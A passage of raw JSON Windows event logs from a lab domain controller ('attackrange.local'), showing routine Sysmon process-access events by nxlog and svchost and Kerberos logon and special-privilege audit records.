C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:25.482","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13BD-5F25-0000-00101E801100}","TargetProcessId":"1492","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9054,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:25.919\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:25.919","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9055,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:26.935\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:26.935","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9056,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:27.951\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:27.951","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9057,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:28.966\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:28.966","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9058,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:29.966\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:29.966","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220709,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x1184DF\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x1184df","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 07:03:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220710,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x1184DF\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{84587115-398E-4BE5-5705-9593D4B595D1}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t52779\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information 